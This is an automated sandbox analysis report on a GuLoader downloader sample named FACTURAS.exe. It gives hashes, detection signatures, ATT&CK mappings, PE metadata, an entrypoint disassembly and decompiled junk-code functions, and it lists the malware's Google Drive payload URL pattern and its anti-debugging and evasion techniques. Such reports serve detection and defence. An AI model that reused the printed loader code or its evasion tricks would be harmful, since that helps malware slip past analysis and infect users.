Loading ...

Play interactive tourEdit tour

Windows Analysis Report FACTURAS.exe

Overview

General Information

Sample Name:FACTURAS.exe
Analysis ID:527918
MD5:ab63f9ba38d9eb4f8bd57ae56a844a31
SHA1:bf1c2a15553f893ff180a307dcb5805c6e440158
SHA256:5d14499fc44a623454a0518972ba97be883b0394f16f08b4265e46ff12ebfeb3
Tags:exeguloader
Infos:

Most interesting Screenshot:

Detection

GuLoader
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Found potential dummy code loops (likely to delay analysis)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Contains functionality to call native functions
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Program does not show much activity (idle)
Uses code obfuscation techniques (call, push, ret)
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Detected potential crypto function

Classification

Process Tree

  • System is w10x64
  • FACTURAS.exe (PID: 6568 cmdline: "C:\Users\user\Desktop\FACTURAS.exe" MD5: AB63F9BA38D9EB4F8BD57AE56A844A31)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download&id="}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.820204862.00000000020D0000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

    Sigma Overview

    No Sigma rule has matched

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Found malware configurationShow sources
    Source: 00000000.00000002.820204862.00000000020D0000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id="}
    Multi AV Scanner detection for submitted fileShow sources
    Source: FACTURAS.exeReversingLabs: Detection: 15%
    Source: FACTURAS.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

    Networking:

    barindex
    C2 URLs / IPs found in malware configurationShow sources
    Source: Malware configuration extractorURLs: https://drive.google.com/uc?export=download&id=
    Source: FACTURAS.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
    Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_020DDD75 NtAllocateVirtualMemory,0_2_020DDD75
    Source: FACTURAS.exe, 00000000.00000000.294184122.0000000000421000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameGILDER.exe vs FACTURAS.exe
    Source: FACTURAS.exeBinary or memory string: OriginalFilenameGILDER.exe vs FACTURAS.exe
    Source: C:\Users\user\Desktop\FACTURAS.exeProcess Stats: CPU usage > 98%
    Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_004036BD0_2_004036BD
    Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_004015380_2_00401538
    Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_004017740_2_00401774
    Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_004017270_2_00401727
    Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_020E6E650_2_020E6E65
    Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_020DDD750_2_020DDD75
    Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_020D924D0_2_020D924D
    Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_020D924F0_2_020D924F
    Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_020D93310_2_020D9331
    Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_020E51380_2_020E5138
    Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_020D96910_2_020D9691
    Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_020DD7F60_2_020DD7F6
    Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_020D94E50_2_020D94E5
    Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_020D95CD0_2_020D95CD
    Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_020E45C50_2_020E45C5
    Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_020E3A470_2_020E3A47
    Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_020DCFA20_2_020DCFA2
    Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_020E4CA70_2_020E4CA7
    Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_020E4DD50_2_020E4DD5
    Source: FACTURAS.exeReversingLabs: Detection: 15%
    Source: C:\Users\user\Desktop\FACTURAS.exeFile created: C:\Users\user\AppData\Local\Temp\~DF26AA5308F7227456.TMPJump to behavior
    Source: FACTURAS.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\FACTURAS.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Users\user\Desktop\FACTURAS.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
    Source: classification engineClassification label: mal72.troj.evad.winEXE@1/1@0/0

    Data Obfuscation:

    barindex
    Yara detected GuLoaderShow sources
    Source: Yara matchFile source: 00000000.00000002.820204862.00000000020D0000.00000040.00000001.sdmp, type: MEMORY
    Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_004013B4 push FFFFFFCDh; iretd 0_2_0040140C
    Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_0040204F push FFFFFFCDh; iretd 0_2_0040206F
    Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_004111C3 push ebp; ret 0_2_00411288
    Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_004051D5 push 0340104Fh; iretd 0_2_004051DB
    Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_00403A4A push esi; retf 0_2_00403A4B
    Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_00402B0E push FFFFFFCDh; iretd 0_2_00402D9B
    Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_00404C1F push eax; ret 0_2_00404C39
    Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_0040BCD6 push 3CF881B8h; ret 0_2_0040BD03
    Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_00413574 push 00000039h; iretd 0_2_00413578
    Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_0040A61E push D9EC50BBh; retf 0_2_0040A62B
    Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_0040A739 push cs; iretd 0_2_0040A73A
    Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_020DE3B0 pushad ; retf 0_2_020DFF57
    Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_020D17FB push cs; ret 0_2_020D17FC
    Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_020D4AE0 push ebp; retf 0_2_020D4AE1
    Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_020D5860 push esp; retn 0004h0_2_020D5992
    Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_020D0E32 pushfd ; iretd 0_2_020D0E3C
    Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_020D5F76 push eax; iretd 0_2_020D5F8B
    Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_020D5FC1 push eax; iretd 0_2_020D5F8B
    Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_020D4C41 push ebp; ret 0_2_020D4C42
    Source: C:\Users\user\Desktop\FACTURAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
    Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_0041724F rdtsc 0_2_0041724F

    Anti Debugging:

    barindex
    Found potential dummy code loops (likely to delay analysis)Show sources
    Source: C:\Users\user\Desktop\FACTURAS.exeProcess Stats: CPU usage > 90% for more than 60s
    Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_020E5138 mov eax, dword ptr fs:[00000030h]0_2_020E5138
    Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_020E3589 mov eax, dword ptr fs:[00000030h]0_2_020E3589
    Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_020D8A51 mov eax, dword ptr fs:[00000030h]0_2_020D8A51
    Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_020DC9F2 mov eax, dword ptr fs:[00000030h]0_2_020DC9F2
    Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_020E2C97 mov eax, dword ptr fs:[00000030h]0_2_020E2C97
    Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
    Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_0041724F rdtsc 0_2_0041724F
    Source: C:\Users\user\Desktop\FACTURAS.exeCode function: 0_2_020E6E65 RtlAddVectoredExceptionHandler,0_2_020E6E65
    Source: FACTURAS.exe, 00000000.00000002.820123754.0000000000C40000.00000002.00020000.sdmpBinary or memory string: Program Manager
    Source: FACTURAS.exe, 00000000.00000002.820123754.0000000000C40000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
    Source: FACTURAS.exe, 00000000.00000002.820123754.0000000000C40000.00000002.00020000.sdmpBinary or memory string: Progman
    Source: FACTURAS.exe, 00000000.00000002.820123754.0000000000C40000.00000002.00020000.sdmpBinary or memory string: Progmanlock

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsWindows Management InstrumentationPath InterceptionProcess Injection1Virtualization/Sandbox Evasion11OS Credential DumpingSecurity Software Discovery11Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection1LSASS MemoryVirtualization/Sandbox Evasion11Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information1Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Information Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    FACTURAS.exe16%ReversingLabsWin32.Downloader.GuLoader

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    No Antivirus matches

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted IPs

    No contacted IP infos

    General Information

    Joe Sandbox Version:34.0.0 Boulder Opal
    Analysis ID:527918
    Start date:24.11.2021
    Start time:15:29:30
    Joe Sandbox Product:CloudBasic
    Overall analysis duration:0h 7m 41s
    Hypervisor based Inspection enabled:false
    Report type:full
    Sample file name:FACTURAS.exe
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
    Number of analysed new started processes analysed:16
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • HDC enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Detection:MAL
    Classification:mal72.troj.evad.winEXE@1/1@0/0
    EGA Information:Failed
    HDC Information:
    • Successful, ratio: 2.3% (good quality ratio 1.4%)
    • Quality average: 30.1%
    • Quality standard deviation: 28.4%
    HCA Information:
    • Successful, ratio: 53%
    • Number of executed functions: 8
    • Number of non-executed functions: 21
    Cookbook Comments:
    • Adjust boot time
    • Enable AMSI
    • Found application associated with file extension: .exe
    • Override analysis time to 240s for sample files taking high CPU consumption
    Warnings:
    Show All
    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
    • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
    • Not all processes where analyzed, report is missing behavior information

    Simulations

    Behavior and APIs

    No simulations

    Joe Sandbox View / Context

    IPs

    No context

    Domains

    No context

    ASN

    No context

    JA3 Fingerprints

    No context

    Dropped Files

    No context

    Created / dropped Files

    C:\Users\user\AppData\Local\Temp\~DF26AA5308F7227456.TMP
    Process:C:\Users\user\Desktop\FACTURAS.exe
    File Type:Composite Document File V2 Document, Cannot read section info
    Category:dropped
    Size (bytes):16384
    Entropy (8bit):0.9277305547216628
    Encrypted:false
    SSDEEP:48:rJSq2Upu8metqPrIXHimU7zdvP1vncU7pCr8P:VSKUpACLFcUVCrG
    MD5:19809EDD1FF00A1D7C105BC58A97CD02
    SHA1:26FB6D339CF2A7474DE6F785166163FA9B2ADBB1
    SHA-256:4745D04A4BB99D70866D722394D9E71F3FAE597AA84E229A1E3B40F31521594C
    SHA-512:434722936006B56B042FB5C72CAB98D8B7615A5A0E48EE6746DD6839BE029029E3BCECF7EFA49DDC8A9DB016FA472FB9EE1CE75126C13E06D66EAA12166A38F7
    Malicious:false
    Reputation:low
    Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

    Static File Info

    General

    File type:PE32 executable (GUI) Intel 80386, for MS Windows
    Entropy (8bit):4.736694563648511
    TrID:
    • Win32 Executable (generic) a (10002005/4) 99.15%
    • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
    • Generic Win/DOS Executable (2004/3) 0.02%
    • DOS Executable Generic (2002/1) 0.02%
    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
    File name:FACTURAS.exe
    File size:135168
    MD5:ab63f9ba38d9eb4f8bd57ae56a844a31
    SHA1:bf1c2a15553f893ff180a307dcb5805c6e440158
    SHA256:5d14499fc44a623454a0518972ba97be883b0394f16f08b4265e46ff12ebfeb3
    SHA512:a8a0d1040432cffc40aaaee619a28703c731b9f3c809db6d915521424a3b4394f3ed46c37c9d7cdd2903d2c8aa33cb9ce87b50acc79de30aa4fbc80b6b264f36
    SSDEEP:1536:t7Do180f9y+zVLdUAcAyB/BMsZWU1/7nYp4r1O/pejim0SD:t7gZz7RcAy/Vkm7nYCr1Omim0S
    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i.......................*..............Rich....................PE..L...#..K.....................0....................@........

    File Icon

    Icon Hash:981dca909cee36b0

    Static PE Info

    General

    Entrypoint:0x4013b4
    Entrypoint Section:.text
    Digitally signed:false
    Imagebase:0x400000
    Subsystem:windows gui
    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
    DLL Characteristics:
    Time Stamp:0x4BCC8F23 [Mon Apr 19 17:13:07 2010 UTC]
    TLS Callbacks:
    CLR (.Net) Version:
    OS Version Major:4
    OS Version Minor:0
    File Version Major:4
    File Version Minor:0
    Subsystem Version Major:4
    Subsystem Version Minor:0
    Import Hash:d77040f4614bccfda7b8aa2e04863738

    Entrypoint Preview

    Instruction
    push 00401FD0h
    call 00007F4684F9E265h
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    xor byte ptr [eax], al
    add byte ptr [eax], al
    cmp byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    push ecx
    sahf
    cmp ebx, esp
    sub dword ptr [ecx+69h], ecx
    inc esp
    sahf
    fild qword ptr [ebx-74h]
    jnp 00007F4684F9E2A9h
    in eax, 54h
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add dword ptr [eax], eax
    add byte ptr [eax], al
    inc ecx
    add al, dh
    pop es
    inc ecx
    add byte ptr [ecx+ebp*2+6Ch], dl
    insb
    jns 00007F4684F9E2E5h
    xor dword ptr [eax], eax
    add byte ptr [eax], al
    add byte ptr [eax], al
    dec esp
    xor dword ptr [eax], eax
    add eax, E27047BEh
    sbb eax, ebx
    push cs
    inc esp
    xchg eax, esp
    push FFFFFFCDh
    iretd
    dec ecx
    mov dl, FEh
    imul eax, dword ptr [esi-081F81EBh], 3Dh
    adc cl, byte ptr [esi-62h]
    ror byte ptr [ebx], 1
    xor eax, FD7A371Dh
    cmp cl, byte ptr [edi-53h]
    xor ebx, dword ptr [ecx-48EE309Ah]
    or al, 00h
    stosb
    add byte ptr [eax-2Dh], ah
    xchg eax, ebx
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    clc
    or dword ptr [eax], eax
    add byte ptr [ebx], bl
    or dword ptr [eax], eax
    add byte ptr [eax], al
    or al, byte ptr [eax]
    push ebx
    popad
    insd
    popad
    jc 00007F4684F9E2DBh
    jne 00007F4684F9E2DFh
    jnc 00007F4684F9E2A5h
    add byte ptr [4F000D01h], cl
    jc 00007F4684F9E2D6h
    outsb
    jnc 00007F4684F9E2DDh
    popad
    jo 00007F4684F9E2DBh
    je 00007F4684F9E2D7h

    Data Directories

    NameVirtual AddressVirtual Size Is in Section
    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
    IMAGE_DIRECTORY_ENTRY_IMPORT0x1dc040x28.text
    IMAGE_DIRECTORY_ENTRY_RESOURCE0x210000xf40.rsrc
    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2300x20
    IMAGE_DIRECTORY_ENTRY_IAT0x10000x11c.text
    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

    Sections

    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
    .text0x10000x1d10c0x1e000False0.344938151042data4.91647345609IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    .data0x1f0000x141c0x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
    .rsrc0x210000xf400x1000False0.337158203125data3.27489444604IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

    Resources

    NameRVASizeTypeLanguageCountry
    CUSTOM0x21e020x13eMS Windows icon resource - 1 icon, 16x16, 16 colorsEnglishUnited States
    CUSTOM0x21cc40x13eMS Windows icon resource - 1 icon, 16x16, 16 colorsEnglishUnited States
    RT_ICON0x2141c0x8a8data
    RT_GROUP_ICON0x214080x14data
    RT_VERSION0x211700x298dataTurkmenTurkmenistan

    Imports

    DLLImport
    MSVBVM60.DLL_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, __vbaEnd, __vbaVarIdiv, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaRecAnsiToUni, __vbaStrCat, __vbaSetSystemError, __vbaRecDestruct, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaOnError, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, DllFunctionCall, _adj_fpatan, __vbaRecUniToAnsi, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaInStr, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaStrToAnsi, __vbaVarDup, __vbaRecDestructAnsi, _CIatan, __vbaStrMove, __vbaCastObj, _allmul, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

    Version Infos

    DescriptionData
    Translation0x0442 0x04b0
    LegalCopyrightLips
    InternalNameGILDER
    FileVersion1.00
    CompanyNameLips
    LegalTrademarksLips
    ProductNameLips
    ProductVersion1.00
    FileDescriptionLips
    OriginalFilenameGILDER.exe

    Possible Origin

    Language of compilation systemCountry where language is spokenMap
    EnglishUnited States
    TurkmenTurkmenistan

    Network Behavior

    No network behavior found

    Code Manipulations

    Statistics

    CPU Usage

    Click to jump to process

    Memory Usage

    Click to jump to process

    System Behavior

    General

    Start time:15:30:30
    Start date:24/11/2021
    Path:C:\Users\user\Desktop\FACTURAS.exe
    Wow64 process (32bit):true
    Commandline:"C:\Users\user\Desktop\FACTURAS.exe"
    Imagebase:0x400000
    File size:135168 bytes
    MD5 hash:AB63F9BA38D9EB4F8BD57AE56A844A31
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:Visual Basic
    Yara matches:
    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.820204862.00000000020D0000.00000040.00000001.sdmp, Author: Joe Security
    Reputation:low

    Disassembly

    Code Analysis

    Reset < >

      Executed Functions

      Memory Dump Source
      • Source File: 00000000.00000002.820204862.00000000020D0000.00000040.00000001.sdmp, Offset: 020D0000, based on PE: false
      Yara matches
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: e12694ea7aed653b8126d3ebfde82874ee063094d305d87ec2adbf4268e8fd19
      • Instruction ID: 6f8e8a3eb8f9c976cd38e67b95e28bff2df7285e6ced879201dc59f248591627
      • Opcode Fuzzy Hash: e12694ea7aed653b8126d3ebfde82874ee063094d305d87ec2adbf4268e8fd19
      • Instruction Fuzzy Hash: 76619D31608385CFDF799E28CD65BEAB7A2BF95310F51412ACD4B8B264D7309A81DB41
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • NtAllocateVirtualMemory.NTDLL ref: 020DE119
      Memory Dump Source
      • Source File: 00000000.00000002.820204862.00000000020D0000.00000040.00000001.sdmp, Offset: 020D0000, based on PE: false
      Yara matches
      Similarity
      • API ID: AllocateMemoryVirtual
      • String ID:
      • API String ID: 2167126740-0
      • Opcode ID: 217cc6775089645a03dfea07f2658c714b2c29ddd1e1ad8d8bbe00d91d6c1707
      • Instruction ID: 8deabb25c0525469df2e69731b331f5dc404f2e847d627b152866c00bdc2b31f
      • Opcode Fuzzy Hash: 217cc6775089645a03dfea07f2658c714b2c29ddd1e1ad8d8bbe00d91d6c1707
      • Instruction Fuzzy Hash: 8241EAB66053848FDBB49E68CC517EE36E2EF58364F01041EEC8D9B220D7348A81DF42
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 36%
      			E004036BD(void* __ebx, void* __edx) {
      				intOrPtr* _t179;
      				intOrPtr* _t183;
      				void* _t184;
      				intOrPtr _t193;
      				void* _t194;
      				void* _t203;
      				void* _t224;
      				signed int* _t225;
      
      				_t194 = __edx;
      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				asm("clc");
      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				 *(_t224 + 0x38) =  *(_t224 + 0x38) + 1;
      				 *(_t224 + 0x38) =  *(_t224 + 0x38) - 1;
      				 *_t225 =  *_t225 ^ 0x00000000;
      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				 *(_t224 + 0x38) =  *(_t224 + 0x38) ^ 0x00000000;
      				 *(_t224 + 0x38) =  *(_t224 + 0x38) ^ 0x00000000;
      				 *_t225 =  *_t225 ^ 0x00000000;
      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				_t193 =  *0x82f616bd;
      				 *(_t224 + 0x38) =  *(_t224 + 0x38) + 1;
      				 *(_t224 + 0x38) =  *(_t224 + 0x38) - 1;
      				 *(_t224 + 0x38) =  *(_t224 + 0x38) + 1;
      				 *(_t224 + 0x38) =  *(_t224 + 0x38) - 1;
      				 *(_t224 + 0x38) =  *(_t224 + 0x38) ^ 0x00000000;
      				asm("cld");
      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				asm("clc");
      				asm("cld");
      				asm("clc");
      				 *(_t224 + 0x38) =  *(_t224 + 0x38) + 1;
      				 *(_t224 + 0x38) =  *(_t224 + 0x38) - 1;
      				 *_t225 =  *_t225 ^ 0x00000000;
      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				_t179 =  *((intOrPtr*)(0x401000));
      				 *_t225 =  *_t225 ^ 0x00000000;
      				 *(_t224 + 0x38) =  *(_t224 + 0x38) ^ 0x00000000;
      				do {
      					 *(_t224 + 0x38) =  *(_t224 + 0x38) ^ 0x00000000;
      					 *_t225 =  *_t225 ^ 0x00000000;
      					 *(_t224 + 0x38) =  *(_t224 + 0x38) + 1;
      					 *(_t224 + 0x38) =  *(_t224 + 0x38) - 1;
      					_t179 = _t179 + 0x20 - 0x21;
      					 *(_t224 + 0x38) =  *(_t224 + 0x38);
      					 *(_t224 + 0x38) =  *(_t224 + 0x38) ^ 0x00000000;
      					asm("fsqrt");
      				} while ( *_t179 != _t193);
      				 *(_t224 + 0x38) =  *(_t224 + 0x38) + 1;
      				 *(_t224 + 0x38) =  *(_t224 + 0x38) - 1;
      				asm("cld");
      				 *_t225 =  *_t225 ^ 0x00000000;
      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				 *(_t224 + 0x38) =  *(_t224 + 0x38) ^ 0x00000000;
      				asm("cld");
      				asm("clc");
      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				 *_t225 =  *_t225 ^ 0x00000000;
      				 *_t225 =  *_t225;
      				 *_t225 =  *_t225 ^ 0x00000000;
      				asm("clc");
      				 *(_t224 + 0x38) =  *(_t224 + 0x38) ^ 0x00000000;
      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				asm("cld");
      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				 *(_t224 + 0x38) =  *(_t224 + 0x38) + 1;
      				 *(_t224 + 0x38) =  *(_t224 + 0x38) - 1;
      				 *_t225 =  *_t225 ^ 0x00000000;
      				 *_t225 =  *_t225 ^ 0x00000000;
      				 *_t225 =  *_t225;
      				 *(_t224 + 0x38) =  *(_t224 + 0x38) + 1;
      				 *(_t224 + 0x38) =  *(_t224 + 0x38) - 1;
      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				 *_t225 =  *_t225 ^ 0x00000000;
      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				 *(_t224 + 0x38) =  *(_t224 + 0x38) ^ 0x00000000;
      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				asm("cld");
      				asm("cld");
      				 *(_t224 + 0x38) =  *(_t224 + 0x38) ^ 0x00000000;
      				asm("clc");
      				 *_t225 =  *_t225 ^ 0x00000000;
      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				 *_t225 =  *_t225;
      				asm("clc");
      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
